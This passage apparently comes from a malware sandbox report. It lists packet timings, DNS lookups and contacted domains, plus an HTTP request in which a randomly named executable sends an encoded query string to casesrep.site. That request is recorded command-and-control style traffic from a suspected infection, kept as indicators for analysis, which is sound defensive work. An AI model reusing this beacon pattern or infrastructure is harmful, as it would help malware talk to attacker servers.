                                          Oct 5, 2024 14:50:25.293977976 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294049025 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294099092 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294150114 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294188976 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294236898 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294271946 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294346094 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294358015 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294399977 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294445992 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294498920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294548988 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294598103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294651031 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294706106 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294742107 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294796944 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294836044 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294884920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.294924021 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.294987917 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295027018 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295087099 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295130014 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295186043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295284986 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295351982 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.295372009 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.295425892 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296060085 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296133041 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296144009 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296195984 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296257019 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296310902 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296343088 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296396971 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.296921968 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.296977043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380631924 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380733967 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380793095 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380846024 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380847931 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380856991 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.380891085 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.380913019 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381055117 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381105900 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381150961 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381201029 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381328106 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381376028 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381416082 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381465912 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381710052 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381762028 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381792068 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381841898 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.381917000 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.381972075 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382185936 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382239103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382281065 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382333040 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382606030 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382638931 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382659912 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382671118 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382729053 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382729053 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382778883 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382816076 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382836103 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382839918 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.382855892 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382882118 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.382982969 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383038998 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383451939 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383505106 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383548021 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383593082 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383737087 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383770943 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383786917 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383790970 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383804083 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383810997 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383860111 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.383863926 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.383904934 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385615110 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385668993 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385700941 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385750055 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385812998 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385843039 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385860920 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385865927 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385875940 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385899067 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385922909 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.385946035 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.385997057 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.467837095 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.467865944 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.467943907 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468010902 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468017101 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468044043 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468055010 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468245029 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468287945 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468307972 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468313932 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468355894 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468683958 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468729973 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468753099 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468756914 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468789101 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468810081 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.468950033 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.468992949 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469023943 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469027996 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469074011 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469079018 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469099045 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469103098 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469141006 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469176054 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469177961 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469201088 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469228029 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469260931 CEST49737443192.168.2.4162.159.140.237
                                          Oct 5, 2024 14:50:25.469270945 CEST44349737162.159.140.237192.168.2.4
                                          Oct 5, 2024 14:50:25.469312906 CEST49737443192.168.2.4162.159.140.237
Oct 5, 2024 14:50:25.469353914 CEST  443    49737  162.159.140.237  192.168.2.4
Oct 5, 2024 14:50:25.469403982 CEST  49737  443    192.168.2.4      162.159.140.237
Oct 5, 2024 14:50:25.473079920 CEST  49737  443    192.168.2.4      162.159.140.237
Oct 5, 2024 14:50:25.473093987 CEST  443    49737  162.159.140.237  192.168.2.4
Oct 5, 2024 14:51:15.381635904 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.386615038 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.386730909 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.394817114 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.399751902 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879261971 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879292011 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879308939 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879324913 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879343033 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879360914 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879360914 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.879380941 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879411936 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879451990 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.879475117 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.879599094 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879612923 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879645109 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:15.879662037 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.879693985 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.884499073 CEST  49946  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:15.889321089 CEST  80     49946  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:30.985245943 CEST  50005  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:30.990325928 CEST  80     50005  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:30.990413904 CEST  50005  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:31.031192064 CEST  50005  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:31.036355972 CEST  80     50005  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:31.455564976 CEST  80     50005  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:31.455770969 CEST  50005  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:32.539904118 CEST  50005  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:32.545173883 CEST  80     50005  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:33.575391054 CEST  50006  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:33.580468893 CEST  80     50006  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:33.580566883 CEST  50006  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:33.612529993 CEST  50006  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:33.617611885 CEST  80     50006  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:34.065638065 CEST  80     50006  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:34.065793991 CEST  50006  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:35.133692026 CEST  50006  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:35.138691902 CEST  80     50006  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.153675079 CEST  50007  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:36.158603907 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.158740997 CEST  50007  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:36.174041986 CEST  50007  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:36.180257082 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.180273056 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.180299044 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.180319071 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.180346012 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.180360079 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.180372000 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.181969881 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.181982994 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.624953032 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:36.625066996 CEST  50007  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:37.680505991 CEST  50007  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:37.685467958 CEST  80     50007  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:38.700318098 CEST  50008  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:38.705193043 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:38.705291986 CEST  50008  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:38.715034008 CEST  50008  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:38.720032930 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172595024 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172616959 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172629118 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172637939 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172648907 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172660112 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172671080 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172681093 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172694921 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172703981 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:39.172827005 CEST  50008  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:39.172869921 CEST  50008  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:39.179131031 CEST  50008  80     192.168.2.4      84.32.84.32
Oct 5, 2024 14:51:39.184118986 CEST  80     50008  84.32.84.32      192.168.2.4
Oct 5, 2024 14:51:44.964231014 CEST  50009  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:44.969228983 CEST  80     50009  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:44.969317913 CEST  50009  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:45.038877964 CEST  50009  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:45.044363976 CEST  80     50009  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:45.818104982 CEST  80     50009  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:45.818223000 CEST  80     50009  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:45.818423033 CEST  50009  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:46.555573940 CEST  50009  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:47.573926926 CEST  50010  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:47.581599951 CEST  80     50010  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:47.581679106 CEST  50010  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:47.599777937 CEST  50010  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:47.606007099 CEST  80     50010  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:48.442344904 CEST  80     50010  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:48.442404032 CEST  80     50010  38.55.251.233    192.168.2.4
Oct 5, 2024 14:51:48.442548037 CEST  50010  80     192.168.2.4      38.55.251.233
Oct 5, 2024 14:51:49.462383986 CEST  50010  80     192.168.2.4      38.55.251.233
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Oct 5, 2024 14:49:43.484046936 CEST  61275        53         192.168.2.4  1.1.1.1
Oct 5, 2024 14:49:43.499520063 CEST  53           61275      1.1.1.1      192.168.2.4
Oct 5, 2024 14:49:46.811347961 CEST  63350        53         192.168.2.4  1.1.1.1
Oct 5, 2024 14:49:46.822504044 CEST  53           63350      1.1.1.1      192.168.2.4
Oct 5, 2024 14:51:15.288131952 CEST  56808        53         192.168.2.4  1.1.1.1
Oct 5, 2024 14:51:15.336386919 CEST  53           56808      1.1.1.1      192.168.2.4
Oct 5, 2024 14:51:44.184854031 CEST  62847        53         192.168.2.4  1.1.1.1
Oct 5, 2024 14:51:44.943151951 CEST  53           62847      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                                         Type            Class        DNS over HTTPS
Oct 5, 2024 14:49:43.484046936 CEST  192.168.2.4  1.1.1.1  0xa6e0    Standard query (0)  6777.6777.6777.677e                          A (IP address)  IN (0x0001)  false
Oct 5, 2024 14:49:46.811347961 CEST  192.168.2.4  1.1.1.1  0xe37e    Standard query (0)  pub-2f7d07153ea1403184d62266d9c28e41.r2.dev  A (IP address)  IN (0x0001)  false
Oct 5, 2024 14:51:15.288131952 CEST  192.168.2.4  1.1.1.1  0xce12    Standard query (0)  www.casesrep.site                            A (IP address)  IN (0x0001)  false
Oct 5, 2024 14:51:44.184854031 CEST  192.168.2.4  1.1.1.1  0x77c5    Standard query (0)  www.kuaimaolife.shop                         A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code      Name                                         CName          Address          Type                    Class        DNS over HTTPS
Oct 5, 2024 14:49:43.499520063 CEST  1.1.1.1    192.168.2.4  0xa6e0    Name error (3)  6777.6777.6777.677e                          none           none             A (IP address)          IN (0x0001)  false
Oct 5, 2024 14:49:46.822504044 CEST  1.1.1.1    192.168.2.4  0xe37e    No error (0)    pub-2f7d07153ea1403184d62266d9c28e41.r2.dev                 162.159.140.237  A (IP address)          IN (0x0001)  false
Oct 5, 2024 14:49:46.822504044 CEST  1.1.1.1    192.168.2.4  0xe37e    No error (0)    pub-2f7d07153ea1403184d62266d9c28e41.r2.dev                 172.66.0.235     A (IP address)          IN (0x0001)  false
Oct 5, 2024 14:51:15.336386919 CEST  1.1.1.1    192.168.2.4  0xce12    No error (0)    www.casesrep.site                            casesrep.site                   CNAME (Canonical name)  IN (0x0001)  false
Oct 5, 2024 14:51:15.336386919 CEST  1.1.1.1    192.168.2.4  0xce12    No error (0)    casesrep.site                                               84.32.84.32      A (IP address)          IN (0x0001)  false
Oct 5, 2024 14:51:44.943151951 CEST  1.1.1.1    192.168.2.4  0x77c5    No error (0)    www.kuaimaolife.shop                                        38.55.251.233    A (IP address)          IN (0x0001)  false

• pub-2f7d07153ea1403184d62266d9c28e41.r2.dev
• www.casesrep.site
• www.kuaimaolife.shop
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49946        84.32.84.32     80                1696  C:\Program Files (x86)\jTDqhSYfqXymuPvGOsWCFJTHSQVAZXdYfSjRCDFUneTzRPANNXGMgtxLGfo\HTiDHBMqChwMbO.exe

Timestamp                            Bytes transferred  Direction  Data
Oct 5, 2024 14:51:15.394817114 CEST  338                OUT        GET /7z6q/?-Ly=tZ6DMnK&ZppxP=TL3drwoENxP57Dd5dOFmv/YKWz0ccyhnGCQdWwUu3IMTL8D4S+Gi1DMSnGJbZzhysdvLIJdHJUOvGXStrAsLXN7Ufb7PIiPGRqZTCzOmV2/ygr+YHVnslTQ= HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.casesrep.site
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Oct 5, 2024 14:51:15.879261971 CEST  1236               IN         HTTP/1.1 200 OK
Server: hcdn
Date: Sat, 05 Oct 2024 12:51:15 GMT
Content-Type: text/html
Content-Length: 10072
Connection: close
Vary: Accept-Encoding
alt-svc: h3=":443"; ma=86400
x-hcdn-request-id: aba4e4092a26c7a9352b7b30672feb8c-bos-edge4
Expires: Sat, 05 Oct 2024 12:51:14 GMT
Cache-Control: no-cache
Accept-Ranges: bytes
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
Oct 5, 2024 14:51:15.879292011 CEST  1236               IN         Data Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
Oct 5, 2024 14:51:15.879308939 CEST  1236               IN         Data Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
Oct 5, 2024 14:51:15.879324913 CEST  672                IN         Data Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
